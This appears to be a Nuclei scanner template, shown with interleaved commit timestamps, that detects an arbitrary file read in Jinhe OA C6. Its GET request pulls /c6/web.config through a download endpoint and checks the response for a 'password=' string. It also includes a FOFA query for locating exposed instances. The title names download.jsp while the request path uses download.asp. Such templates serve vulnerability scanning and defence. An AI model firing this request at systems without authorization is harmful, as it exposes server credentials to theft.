2023-08-21 14:23:32 +00:00
id : jinhe-oa-c6-lfi
info :
2023-08-22 07:54:50 +00:00
name : Jinhe OA C6 download.jsp - Arbitary File Read
2023-08-21 14:23:32 +00:00
author : SleepingBag945
severity : high
description : |
There is an arbitrary file read vulnerability in Jinhe OA C6 download.jsp file, through which an attacker can obtain sensitive information in the server
metadata :
verified : true
max-request : 1
2023-10-14 11:27:55 +00:00
fofa-query : app="金和网络-金和OA"
2023-08-21 14:23:32 +00:00
tags : jinhe,lfi,misconfig
http :
- method : GET
path :
- '{{BaseURL}}/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config'
matchers :
- type : dsl
dsl :
- 'status_code == 200'
- 'contains(body,"<configuration>") && contains(body,"password=")'
- 'contains(header,"filename=") && contains(header,"application/octet-stream")'
condition : and
2023-10-20 11:41:13 +00:00
# digest: 4b0a00483046022100b942c267c18f7114bec499102340f92937d9397470c30c50ac39e3b43a7aef70022100af81851d22ceacf05679af185781e0bc9d76a5bcc63433cc5e6e0f744d364420:922c64590222798bb761d5b6d8e72950